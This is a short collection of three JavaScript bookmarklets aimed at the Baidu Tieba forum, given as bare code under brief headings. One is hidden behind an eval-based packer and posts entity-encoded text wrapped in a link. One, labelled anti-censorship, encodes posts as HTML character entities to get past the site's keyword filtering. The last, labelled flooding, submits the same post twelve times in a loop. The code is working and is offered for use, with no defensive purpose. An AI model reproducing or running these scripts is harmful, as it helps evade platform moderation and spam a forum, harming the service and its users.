javascript: eval(function(p,a,c,k,e,r){e=function(c){return c.toString(36)};if('0'.replace(0,e)==0){while(c--)r[e(c)]=k[c];k=[function(e){return r[e]||e}];e=function(){return'[2-9ce-hj-m]'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('2 3=prompt(\'输入要回复的蓝字\');2 4="";9(2 i=0;i<3.c;i++){g(3.7(i)<128){4+=3.charAt(i)}else{2 5=3.7(i);g((5&0xFC00)==h)5=(5-h)*1024+3.7(i+1)-0xDC00+0x10000,i++;{4+="&#"+5+";"}}}3=4.8(/<\\/?a[^>]*>/j,"").8(/&/j,"&");2 6=new Array();2 i=0;while(/<[^>]*>|&k;|@\\S*/.test(3)){6[i]=/<[^>]*>|&k;|@\\S*/.exec(3);3=3.8(6[i],"㊣");i++}4="";9(2 i=0;i<3.c;i++){4+="&#"+3.7(i)+";"}9(2 i=0;i<6.c;i++){2 l=6[i]+"";4=4.8(/㊣/,l)}2 e=f._getData();2 a=\'<a style="color: red;" href="http://\';2 b=\'/" target="_blank">\';2 d="< /a>";e.content=a+4+b+4+d;PostHandler.post(f._option.url,e,m(I){unsafeWindow.f.showAddResult(I)},m(I){});',[],23,'||var|str|out|uc|temps|charCodeAt|replace|for|||length||tieba|rich_postor|if|0xD800||gi|nbsp|temp|function'.split('|'),0,{}))
```

Tieba anti-censorship:

```javascript
javascript:a=function(text){var result="";for(var i=0;i<text.length;i++){result+='&#'+text.charCodeAt(i)+';'};return result};var c=rich_postor._getData();c.content=a('请输入帖子内容');PostHandler.post(rich_postor._option.url,c,function(I){rich_postor.showAddResult(I)},function(I){});
```

Tieba flooding:

```javascript
javascript:var c=rich_postor._getData();c.content='请输入帖子内容';for(var i=1;i<=12;i++){PostHandler.post(rich_postor._option.url,c,function(I){rich_postor.showAddResult(I)},function(I){});};void 0
```